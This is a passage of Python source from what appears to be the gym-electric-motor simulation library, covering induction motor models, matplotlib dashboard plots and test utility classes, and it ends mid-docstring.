i_sc A Stator current through branch c
i_salpha A Stator current in alpha direction
i_sbeta A Stator current in beta direction
=============== ====== =============================================
=============== ====== =============================================
Rotor flux Unit Description
=============== ====== =============================================
psi_rd Vs Direct axis of the rotor oriented flux
psi_rq Vs Quadrature axis of the rotor oriented flux
psi_ra Vs Rotor oriented flux in branch a
psi_rb Vs Rotor oriented flux in branch b
psi_rc Vs Rotor oriented flux in branch c
psi_ralpha Vs Rotor oriented flux in alpha direction
psi_rbeta Vs Rotor oriented flux in beta direction
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Stator voltage through branch a
u_sb V Stator voltage through branch b
u_sc V Stator voltage through branch c
u_salpha V Stator voltage in alpha axis
u_sbeta V Stator voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
#### Parameters taken from DOI: 10.1109/EPEPEMC.2018.8522008 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 143.75e-3,
'l_sigs': 5.87e-3,
'l_sigr': 5.87e-3,
'j_rotor': 1.1e-3,
'r_s': 2.9338,
'r_r': 1.355,
}
_default_limits = dict(omega=4e3 * np.pi / 30, torque=0.0, i=5.5, epsilon=math.pi, u=560)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=3.9, epsilon=math.pi, u=560)
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def electrical_ode(self, state, u_salphabeta, omega, *args):
"""
The differential equation of the SCIM.
Sets u_ralpha = u_rbeta = 0 before calling the respective super function.
"""
u_ralphabeta = np.zeros_like(u_salphabeta)
        u_sr_alphabeta = np.array([u_salphabeta, u_ralphabeta])
        return super().electrical_ode(state, u_sr_alphabeta, omega, *args)
def _update_limits(self, limit_values={}, nominal_values={}):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES, self.IO_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_s']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / self._motor_parameter['r_s']
super()._update_limits(limits_agenda, nominal_agenda)
def _update_initial_limits(self, nominal_new={}, omega=None):
# Docstring of superclass
# draw a sample magnetic field angle from [-pi,pi]
eps_mag = 2 * np.pi * np.random.random_sample() - np.pi
flux_alphabeta_limits = self._flux_limit(omega=omega,
eps_mag=eps_mag,
u_q_max=self._nominal_values['u_sq'])
# using absolute value, because limits should describe upper limit
# after abs-operator, norm of alphabeta flux still equal to
# d-component of flux
flux_alphabeta_limits = np.abs(flux_alphabeta_limits)
flux_nominal_limits = {state: value for state, value in
zip(self.FLUXES, flux_alphabeta_limits)}
flux_nominal_limits.update(nominal_new)
super()._update_initial_limits(flux_nominal_limits)
class DoublyFedInductionMotor(InductionMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
    r_s                   Ohm        4.42          Stator resistance
    r_r                   Ohm        3.51          Rotor resistance
    l_m                   H          297.5e-3      Main inductance
    l_sigs                H          25.71e-3      Stator-side stray inductance
    l_sigr                H          25.71e-3      Rotor-side stray inductance
    p                     1          2             Pole pair number
    j_rotor               kg/m^2     13.695e-3     Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Current through branch a
i_sb A Current through branch b
i_sc A Current through branch c
i_salpha A Current in alpha axis
i_sbeta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Rotor flux Unit Description
=============== ====== =============================================
psi_rd Vs Direct axis of the rotor oriented flux
psi_rq Vs Quadrature axis of the rotor oriented flux
psi_ra Vs Rotor oriented flux in branch a
psi_rb Vs Rotor oriented flux in branch b
psi_rc Vs Rotor oriented flux in branch c
psi_ralpha Vs Rotor oriented flux in alpha direction
psi_rbeta Vs Rotor oriented flux in beta direction
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Stator voltage through branch a
u_sb V Stator voltage through branch b
u_sc V Stator voltage through branch c
u_salpha V Stator voltage in alpha axis
u_sbeta V Stator voltage in beta axis
u_ralpha V Rotor voltage in alpha axis
u_rbeta V Rotor voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
u_ralpha Rotor voltage in alpha axis
u_rbeta Rotor voltage in beta axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
ROTOR_VOLTAGES = ['u_ralpha', 'u_rbeta']
ROTOR_CURRENTS = ['i_ralpha', 'i_rbeta']
IO_ROTOR_VOLTAGES = ['u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq']
IO_ROTOR_CURRENTS = ['i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq']
#### Parameters taken from DOI: 10.1016/j.jestch.2016.01.015 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 297.5e-3,
'l_sigs': 25.71e-3,
'l_sigr': 25.71e-3,
'j_rotor': 13.695e-3,
'r_s': 4.42,
'r_r': 3.51,
}
_default_limits = dict(omega=1800 * np.pi / 30, torque=0.0, i=9, epsilon=math.pi, u=720)
_default_nominal_values = dict(omega=1650 * np.pi / 30, torque=0.0, i=7.5, epsilon=math.pi, u=720)
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def __init__(self, **kwargs):
        # rebind (instead of +=) so the class-level lists are not mutated in place
        self.IO_VOLTAGES = self.IO_VOLTAGES + self.IO_ROTOR_VOLTAGES
        self.IO_CURRENTS = self.IO_CURRENTS + self.IO_ROTOR_CURRENTS
super().__init__(**kwargs)
def _update_limits(self, limit_values={}, nominal_values={}):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES+self.ROTOR_VOLTAGES,
self.IO_CURRENTS+self.ROTOR_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_r']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / \
self._motor_parameter['r_r']
super()._update_limits(limits_agenda, nominal_agenda)
def _update_initial_limits(self, nominal_new={}, omega=None):
# Docstring of superclass
# draw a sample magnetic field angle from [-pi,pi]
eps_mag = 2 * np.pi * np.random.random_sample() - np.pi
flux_alphabeta_limits = self._flux_limit(omega=omega,
eps_mag=eps_mag,
u_q_max=self._nominal_values['u_sq'],
u_rq_max=self._nominal_values['u_rq'])
flux_nominal_limits = {state: value for state, value in
zip(self.FLUXES, flux_alphabeta_limits)}
super()._update_initial_limits(flux_nominal_limits)
```
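The limit conventions in the notes above are easy to get wrong, so here is a small worked sketch of the described conversion (the 400 V / 10 A ratings are invented example values, not library defaults):
```python
import math
# Hypothetical nameplate data: RMS line-to-line voltage and RMS phase current.
U_L = 400.0  # V (rms, line-to-line)
I_S = 10.0   # A (rms, phase)
# Per the docstring notes: u_hat = sqrt(2/3) * U_L and i_hat = sqrt(2) * I_S.
u_hat = math.sqrt(2 / 3) * U_L  # ~326.6 V phase-voltage amplitude
i_hat = math.sqrt(2) * I_S      # ~14.14 A phase-current amplitude
limit_values = {'u': u_hat, 'i': i_hat}  # shaped like the limit_values argument above
print(limit_values)
```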
#### File: visualization/motor_dashboard_plots/episode_length_plot.py
```python
from .base_plots import EpisodePlot
class EpisodeLengthPlot(EpisodePlot):
"""Plot to display the lengths of all episodes."""
def __init__(self):
super().__init__()
# data container for episode lengths
self._episode_lengths = []
self._episode_length = 0
self._episode_no = 0
self._label = 'Episode Length'
self._axis = None
# Flag, that is true, if an episode has ended before the rendering.
self._reset = False
self._y_data.append(self._episode_lengths)
def initialize(self, axis):
"""
Args:
axis (object): the subplot axis for plotting the action variable
"""
super().initialize(axis)
        line, = self._axis.plot([], self._episode_lengths, color=self._colors[0])
        self._lines.append(line)
def on_step_end(self, k, state, reference, reward, done):
self._episode_length = k
def _set_y_data(self):
self._episode_lengths.append(self._episode_length)
self._episode_length = 0
```
#### File: visualization/motor_dashboard_plots/reward_plot.py
```python
import numpy as np
from .base_plots import TimePlot
class RewardPlot(TimePlot):
"""Plot to display the instantaneous reward during the episode"""
def __init__(self):
super().__init__()
self._reward_range = None
self._reward_line = None
self._reward_data = None
self._reward_line_cfg = self._default_time_line_cfg.copy()
self._reward_line_cfg['color'] = self._colors[-1]
def initialize(self, axis):
super().initialize(axis)
self._reward_line, = self._axis.plot(self._x_data, self._reward_data, **self._reward_line_cfg)
self._lines.append(self._reward_line)
def set_env(self, env):
super().set_env(env)
self._reward_range = env.reward_range
self._reward_data = np.zeros_like(self._x_data, dtype=float) * np.nan
self._y_data = [self._reward_data]
min_limit = self._reward_range[0]
max_limit = self._reward_range[1]
spacing = 0.1 * (max_limit - min_limit)
self._y_lim = (min_limit - spacing, max_limit + spacing)
self._label = 'reward'
def on_step_end(self, k, state, reference, reward, done):
idx = self.data_idx
self._x_data[idx] = self._t
self._reward_data[idx] = reward
super().on_step_end(k, state, reference, reward, done)
```
#### File: visualization/motor_dashboard_plots/state_plot.py
```python
import numpy as np
from .base_plots import TimePlot
class StatePlot(TimePlot):
"""Plot to display the environments states and their references."""
_default_limit_line_cfg = {
'color': 'red',
'linestyle': '--',
'linewidth': 1
}
# Labels for each state variable.
state_labels = {
'omega': r'$\omega$/(1/s)',
'torque': '$T$/Nm',
'i': '$i$/A',
'i_a': '$i_{a}$/A',
'i_e': '$i_{e}$/A',
'i_b': '$i_{b}$/A',
'i_c': '$i_{c}$/A',
'i_sq': '$i_{sq}$/A',
'i_sd': '$i_{sd}$/A',
'u': '$u$/V',
'u_a': '$u_{a}$/V',
'u_b': '$u_{b}$/V',
'u_c': '$u_{c}$/V',
'u_sq': '$u_{sq}$/V',
'u_sd': '$u_{sd}$/V',
'u_e': '$u_{e}$/V',
'u_sup': '$u_{sup}$/V',
'epsilon': r'$\epsilon$/rad'
}
def __init__(self, state):
"""
Args:
state(str): Name of the state to plot
"""
super().__init__()
self._state_line_config = self._default_time_line_cfg.copy()
self._ref_line_config = self._default_time_line_cfg.copy()
self._limit_line_config = self._default_limit_line_cfg.copy()
#: State space of the plotted variable
self._state_space = None
#: State name of the plotted variable
self._state = state
#: Index in the state array of the plotted variable
self._state_idx = None
#: Maximal value of the plotted variable
self._limits = None
# Bool: Flag if the plotted variable is referenced.
self._referenced = None
# matplotlib-Lines for the state and reference
self._state_line = None
self._reference_line = None
# Data containers
self._state_data = []
self._ref_data = []
# Flag, if the passed data is normalized
self._normalized = True
def set_env(self, env):
# Docstring of superclass
super().set_env(env)
ps = env.physical_system
rg = env.reference_generator
# Save the index of the state.
self._state_idx = ps.state_positions[self._state]
# The maximal values of the state.
self._limits = ps.limits[self._state_idx]
self._state_space = ps.state_space.low[self._state_idx], ps.state_space.high[self._state_idx]
# Bool: if the state is referenced.
self._referenced = rg.referenced_states[self._state_idx]
# Bool: if the data is already normalized to an interval of [-1, 1]
self._normalized = self._limits != self._state_space[1]
# Initialize the data containers
self._state_data = np.ones(self._x_width) * np.nan
self._ref_data = np.ones(self._x_width) * np.nan
min_limit = self._limits * self._state_space[0] if self._normalized else self._state_space[0]
max_limit = self._limits * self._state_space[1] if self._normalized else self._state_space[1]
spacing = 0.1 * (max_limit - min_limit)
        # Set the y-axis limits to fixed initial values
self._y_lim = (min_limit - spacing, max_limit + spacing)
# Set the y-axis label
self._label = self.state_labels.get(self._state, self._state)
def initialize(self, axis):
# Docstring of superclass
super().initialize(axis)
# Line to plot the state data
self._state_line, = self._axis.plot(self._x_data, self._state_data, **self._state_line_config)
self._lines = [self._state_line]
# If the state is referenced plot also the reference line
if self._referenced:
self._reference_line, = self._axis.plot(self._x_data, self._ref_data, **self._ref_line_config)
# Plot state line in front
axis.lines = axis.lines[::-1]
self._lines.append(self._reference_line)
min_limit = self._limits * self._state_space[0] if self._normalized else self._state_space[0]
max_limit = self._limits * self._state_space[1] if self._normalized else self._state_space[1]
if self._state_space[0] < 0:
self._axis.axhline(min_limit, **self._limit_line_config)
lim = self._axis.axhline(max_limit, **self._limit_line_config)
y_label = self._label
unit_split = y_label.find('/')
if unit_split == -1:
unit_split = len(y_label)
limit_label = y_label[:unit_split] + r'$_{\mathrm{max}}$' + y_label[unit_split:]
if self._referenced:
ref_label = y_label[:unit_split] + r'$^*$' + y_label[unit_split:]
self._axis.legend(
(self._state_line, self._reference_line, lim), (y_label, ref_label, limit_label), loc='upper left',
numpoints=20
)
else:
self._axis.legend((self._state_line, lim), (y_label, limit_label), loc='upper left', numpoints=20)
self._y_data = [self._state_data, self._ref_data]
def on_step_end(self, k, state, reference, reward, done):
super().on_step_end(k, state, reference, reward, done)
# Write the data to the data containers
state_ = state[self._state_idx]
ref = reference[self._state_idx]
idx = self.data_idx
self._x_data[idx] = self._t
self._state_data[idx] = state_ * self._limits
if self._referenced:
self._ref_data[idx] = ref * self._limits
```
#### File: gym_electric_motor/visualization/motor_dashboard.py
```python
from gym_electric_motor.core import ElectricMotorVisualization
from .motor_dashboard_plots import StatePlot, ActionPlot, RewardPlot, TimePlot, EpisodePlot, StepPlot
import matplotlib.pyplot as plt
import gym
class MotorDashboard(ElectricMotorVisualization):
"""A dashboard to plot the GEM states into graphs.
Every MotorDashboard consists of multiple MotorDashboardPlots that are each responsible for the plots in a single
matplotlib axis.
    It handles three different types of plots: the TimePlot, EpisodePlot and StepPlot, which differ mainly in
    their x-axis. The TimePlots are updated every step and have the time on their x-axis. The EpisodePlots show
    statistics over whole episodes (e.g. the mean reward per step in each episode); the episode number is on
    their x-axis. The StepPlots show statistics over the last taken steps (e.g. the mean reward over the last
    1000 steps); their x-axis is the cumulative number of steps.
    The TimePlots, EpisodePlots and StepPlots are plotted into three separate figures.
    The most common TimePlots (i.e. those for the states, actions and rewards) can be requested by just passing
    the corresponding arguments to the constructor. Additional plots (e.g. the MeanEpisodeRewardPlot) have to be
    instantiated manually and passed to the constructor.
Furthermore, completely custom plots can be defined. They have to derive from the TimePlot, EpisodePlot or
StepPlot base classes.
"""
def __init__(self, state_plots=(), action_plots=(), reward_plot=False, additional_plots=(),
update_interval=1000, step_plot_width=10000, style=None, **__):
"""
Args:
state_plots('all'/iterable(str)): An iterable of state names to be shown. If 'all' all states will be shown.
Default: () (no plotted states)
            action_plots('all'/iterable(int)): If action_plots='all', all actions will be plotted. If the
                environment has more than one action, individual actions can be selected by their indices.
                Default: () (no plotted actions).
reward_plot(boolean): Select if the current reward is to be plotted. Default: False
additional_plots(iterable((TimePlot/EpisodePlot/StepPlot))): Additional already instantiated plots
to be shown on the dashboard
update_interval(int > 0): Amount of steps after which the plots are updated. Updating each step reduces the
performance drastically. Default: 1000
step_plot_width(int > 0): Width of the step plots in steps. Default: 10000 steps
(1 second for continuously controlled environments / 0.1 second for discretely controlled environments)
style(string): Select one of the matplotlib-styles. e.g. "dark-background".
Default: None (the already selected style)
"""
# Basic assertions
assert type(reward_plot) is bool
assert all(isinstance(ap, (TimePlot, EpisodePlot, StepPlot)) for ap in additional_plots)
assert type(update_interval) in [int, float]
assert update_interval > 0
assert type(step_plot_width) in [int, float]
assert step_plot_width > 0
assert style in plt.style.available or style is None
super().__init__()
# Select the matplotlib style
if style is not None:
plt.style.use(style)
# List of the opened figures
self._figures = []
        # The figures to be opened for the time plots, episodic plots and step plots
self._time_plot_figure = None
self._episodic_plot_figure = None
self._step_plot_figure = None
# Store the input data
self._state_plots = state_plots
self._action_plots = action_plots
self._reward_plot = reward_plot
        # Separate the additional plots into TimePlots, EpisodePlots and StepPlots
self._custom_step_plots = [p for p in additional_plots if isinstance(p, TimePlot)]
self._episodic_plots = [p for p in additional_plots if isinstance(p, EpisodePlot)]
self._step_plots = [p for p in additional_plots if isinstance(p, StepPlot)]
self._time_plots = []
self._update_interval = int(update_interval)
self._step_plot_width = int(step_plot_width)
self._plots = []
self._k = 0
self._update_render = False
def on_reset_begin(self):
"""Called before the environment is reset. All subplots are reset.
"""
for plot in self._plots:
plot.on_reset_begin()
def on_reset_end(self, state, reference):
"""Called after the environment is reset. The initial data is passed.
Args:
state(array(float)): The initial state :math:`s_0`.
reference(array(float)): The initial reference for the first time step :math:`s^*_0`.
"""
for plot in self._plots:
plot.on_reset_end(state, reference)
def on_step_begin(self, k, action):
"""The information about the last environmental step is passed.
Args:
k(int): The current episode step.
action(ndarray(float) / int): The taken action :math:`a_k`.
"""
for plot in self._plots:
plot.on_step_begin(k, action)
def on_step_end(self, k, state, reference, reward, done):
"""The information after the step is passed
Args:
k(int): The current episode step
state(array(float)): The state of the env after the step :math:`s_k`.
reference(array(float)): The reference corresponding to the state :math:`s^*_k`.
reward(float): The reward that has been received for the last action that lead to the current state
:math:`r_{k}`.
done(bool): Flag, that indicates, if the last action lead to a terminal state :math:`t_{k}`.
"""
for plot in self._plots:
plot.on_step_end(k, state, reference, reward, done)
self._k += 1
if self._k % self._update_interval == 0:
self._update_render = True
def render(self):
"""Updates the plots every *update cycle* calls of this method."""
if not (self._time_plot_figure or self._episodic_plot_figure or self._step_plot_figure) \
and len(self._plots) > 0:
self._initialize()
if self._update_render:
self._update()
self._update_render = False
def set_env(self, env):
"""Called during initialization of the environment to interconnect all modules. State names, references,...
might be saved here for later processing
Args:
env(ElectricMotorEnvironment): The environment.
"""
state_names = env.physical_system.state_names
if self._state_plots == 'all':
self._state_plots = state_names
if self._action_plots == 'all':
if type(env.action_space) is gym.spaces.Discrete:
self._action_plots = [0]
elif type(env.action_space) is gym.spaces.Box:
self._action_plots = list(range(env.action_space.shape[0]))
self._time_plots = []
if len(self._state_plots) > 0:
assert all(state in state_names for state in self._state_plots)
for state in self._state_plots:
self._time_plots.append(StatePlot(state))
if len(self._action_plots) > 0:
assert type(env.action_space) in (gym.spaces.Box, gym.spaces.Discrete), \
f'Action space of type {type(env.action_space)} not supported for plotting.'
for action in self._action_plots:
ap = ActionPlot(action)
self._time_plots.append(ap)
if self._reward_plot:
self._reward_plot = RewardPlot()
self._time_plots.append(self._reward_plot)
self._plots = self._time_plots + self._episodic_plots + self._step_plots
for step_plot in self._time_plots:
step_plot.set_width(self._step_plot_width)
for plot in self._plots:
plot.set_env(env)
def _initialize(self):
"""Called with first render() call to setup the figures and plots."""
plt.close()
self._figures = []
# create separate figures for time based, step and episode based plots
if len(self._time_plots) > 0:
self._time_plot_figure, axes_step = plt.subplots(len(self._time_plots), sharex=True)
self._time_plot_figure.canvas.set_window_title('Time Plots')
axes_step = [axes_step] if len(self._time_plots) == 1 else axes_step
self._time_plot_figure.subplots_adjust(wspace=0.0, hspace=0.2)
axes_step[-1].set_xlabel('$t$/s')
self._figures.append(self._time_plot_figure)
for plot, axis in zip(self._time_plots, axes_step):
plot.initialize(axis)
if len(self._episodic_plots) > 0:
self._episodic_plot_figure, axes_ep = plt.subplots(len(self._episodic_plots), sharex=True)
axes_ep = [axes_ep] if len(self._episodic_plots) == 1 else axes_ep
self._episodic_plot_figure.subplots_adjust(wspace=0.0, hspace=0.02)
self._episodic_plot_figure.canvas.set_window_title('Episodic Plots')
axes_ep[-1].set_xlabel('Episode No')
self._figures.append(self._episodic_plot_figure)
for plot, axis in zip(self._episodic_plots, axes_ep):
plot.initialize(axis)
if len(self._step_plots) > 0:
self._step_plot_figure, axes_int = plt.subplots(len(self._step_plots), sharex=True)
axes_int = [axes_int] if len(self._step_plots) == 1 else axes_int
self._step_plot_figure.canvas.set_window_title('Step Plots')
self._step_plot_figure.subplots_adjust(wspace=0.0, hspace=0.02)
axes_int[-1].set_xlabel('Cumulative Steps')
self._figures.append(self._step_plot_figure)
for plot, axis in zip(self._step_plots, axes_int):
plot.initialize(axis)
plt.pause(0.1)
def _update(self):
"""Called every *update cycle* steps to refresh the figure."""
for plot in self._plots:
plot.render()
for fig in self._figures:
fig.canvas.draw()
fig.canvas.flush_events()
```
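Based on the constructor documented above, a dashboard could be configured roughly as follows (a hedged sketch; `env` stands for an already created gym-electric-motor environment, and the import path is assumed):
```python
from gym_electric_motor.visualization import MotorDashboard
# Plot all states, the first action and the reward; refresh every 500 steps.
dashboard = MotorDashboard(
    state_plots='all',
    action_plots=[0],
    reward_plot=True,
    update_interval=500,
    step_plot_width=10000,
)
# The environment calls dashboard.set_env(env) while wiring its modules,
# after which dashboard.render() can be invoked once per step.
```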
#### File: gym-electric-motor/tests/testing_utils.py
```python
from .conf import *
from gym_electric_motor.physical_systems import *
from gym_electric_motor.utils import make_module, set_state_array
from gym_electric_motor import ReferenceGenerator, RewardFunction, PhysicalSystem, ElectricMotorVisualization, \
ConstraintMonitor
from gym_electric_motor.physical_systems import PowerElectronicConverter, MechanicalLoad, ElectricMotor, OdeSolver, \
VoltageSupply, NoiseGenerator
import gym_electric_motor.physical_systems.converters as cv
from gym_electric_motor.physical_systems.physical_systems import SCMLSystem
import numpy as np
from gym.spaces import Box, Discrete
from scipy.integrate import ode
from tests.conf import system, jacobian, permex_motor_parameter
from gym_electric_motor.utils import instantiate
from gym_electric_motor.core import Callback, ElectricMotorEnvironment
# Constraint is used by DummyConstraint below; import path assumed from the installed package
from gym_electric_motor.constraints import Constraint
# region first version
def setup_physical_system(motor_type, converter_type, subconverters=None, three_phase=False):
"""
Function to set up a physical system with test parameters
:param motor_type: motor name (string)
:param converter_type: converter name (string)
    :param subconverters: optional list of subconverters for multi-converters
    :param three_phase: if True, then a three-phase (induction/synchronous) motor system will be instantiated
:return: instantiated physical system
"""
# get test parameter
tau = converter_parameter['tau']
u_sup = test_motor_parameter[motor_type]['motor_parameter']['u_sup']
motor_parameter = test_motor_parameter[motor_type]['motor_parameter'] # dict
nominal_values = test_motor_parameter[motor_type]['nominal_values'] # dict
limit_values = test_motor_parameter[motor_type]['limit_values'] # dict
# setup load
load = PolynomialStaticLoad(load_parameter=load_parameter['parameter'])
# setup voltage supply
voltage_supply = IdealVoltageSupply(u_sup)
# setup converter
if motor_type == 'DcExtEx':
if 'Disc' in converter_type:
double_converter = 'Disc-Multi'
else:
double_converter = 'Cont-Multi'
converter = make_module(PowerElectronicConverter, double_converter,
subconverters=[converter_type, converter_type],
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
else:
converter = make_module(PowerElectronicConverter, converter_type,
subconverters=subconverters,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
# setup motor
motor = make_module(ElectricMotor, motor_type, motor_parameter=motor_parameter, nominal_values=nominal_values,
limit_values=limit_values)
# setup solver
solver = ScipySolveIvpSolver(method='RK45')
# combine all modules to a physical system
if three_phase:
if motor_type == "SCIM":
physical_system = SquirrelCageInductionMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
elif motor_type == "DFIM":
            physical_system = DoublyFedInductionMotorSystem(converter=converter, motor=motor, ode_solver=solver,
                                                            supply=voltage_supply, load=load, tau=tau)
else:
physical_system = SynchronousMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
else:
physical_system = DcMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
return physical_system
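# Example usage (hypothetical keys; assumes 'DcPermEx' and 'Cont-1QC' are defined in tests/conf.py):
# physical_system = setup_physical_system('DcPermEx', 'Cont-1QC')
# print(physical_system.state_names)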
def setup_reference_generator(reference_type, physical_system, reference_state='omega'):
"""
Function to setup the reference generator
:param reference_type: name of reference generator
:param physical_system: instantiated physical system
:param reference_state: referenced state name (string)
:return: instantiated reference generator
"""
reference_generator = make_module(ReferenceGenerator, reference_type, reference_state=reference_state)
reference_generator.set_modules(physical_system)
reference_generator.reset()
return reference_generator
def setup_reward_function(reward_function_type, physical_system, reference_generator, reward_weights, observed_states):
reward_function = make_module(RewardFunction, reward_function_type, observed_states=observed_states,
reward_weights=reward_weights)
reward_function.set_modules(physical_system, reference_generator)
return reward_function
def setup_dc_converter(conv, motor_type, subconverters=None):
"""
This function initializes the converter.
It differentiates between single and double converter and can be used for discrete and continuous converters.
:param conv: converter name (string)
:param motor_type: motor name (string)
:return: initialized converter
"""
if motor_type == 'DcExtEx':
# setup double converter
if 'Disc' in conv:
double_converter = 'Disc-Multi'
else:
double_converter = 'Cont-Multi'
converter = make_module(PowerElectronicConverter, double_converter,
interlocking_time=converter_parameter['interlocking_time'],
dead_time=converter_parameter['dead_time'],
subconverters=[make_module(PowerElectronicConverter, conv,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time']),
make_module(PowerElectronicConverter, conv,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])])
else:
# setup single converter
converter = make_module(PowerElectronicConverter, conv,
subconverters=subconverters,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
return converter
# endregion
# region second version
instantiate_dict = {}
def mock_instantiate(superclass, key, **kwargs):
# Instantiate the object and log the passed and returned values to validate correct function calls
instantiate_dict[superclass] = {}
instantiate_dict[superclass]['key'] = key
inst = instantiate(superclass, key, **kwargs)
instantiate_dict[superclass]['instance'] = inst
return inst
class DummyReferenceGenerator(ReferenceGenerator):
reference_space = Box(0, 1, shape=(1,))
_reset_counter = 0
def __init__(self, reference_observation=np.array([1]), reference_state='dummy_state_0', **kwargs):
self.kwargs = kwargs
self.closed = False
self.physical_system = None
self.get_reference_state = None
self.get_reference_obs_state = None
self.trajectory = np.sin(np.linspace(0, 50, 100))
self._reference_state = reference_state
self.reference_observation = reference_observation
self.reference_array = None
def set_modules(self, physical_system):
self.physical_system = physical_system
self.reference_array = np.ones_like(physical_system.state_names).astype(float)
super().set_modules(physical_system)
self._referenced_states = set_state_array(
{self._reference_state: 1}, physical_system.state_names
).astype(bool)
def reset(self, initial_state=None, initial_reference=None):
self._reset_counter += 1
res = super().reset(initial_state, initial_reference)
return res[0], res[1], self.trajectory
def get_reference(self, state, *_, **__):
self.get_reference_state = state
return self.reference_array
def get_reference_observation(self, state, *_, **__):
self.get_reference_obs_state = state
return self.reference_observation
def close(self):
self.closed = True
super().close()
class DummyRewardFunction(RewardFunction):
def __init__(self, **kwargs):
self.last_state = None
self.last_reference = None
self.last_action = None
self.last_time_step = None
self.closed = False
self.done = False
self.kwargs = kwargs
super().__init__()
def reset(self, initial_state=None, initial_reference=None):
self.last_state = initial_state
self.last_reference = initial_reference
super().reset(initial_state, initial_reference)
def reward(self, state, reference, k=None, action=None, violation_degree=0.0):
self.last_state = state
self.last_reference = reference
self.last_action = action
self.last_time_step = k
return -1 if violation_degree == 1 else 1
def close(self):
self.closed = True
super().close()
def _limit_violation_reward(self, state):
pass
def _reward(self, state, reference, action):
pass
class DummyPhysicalSystem(PhysicalSystem):
@property
def limits(self):
"""
Returns:
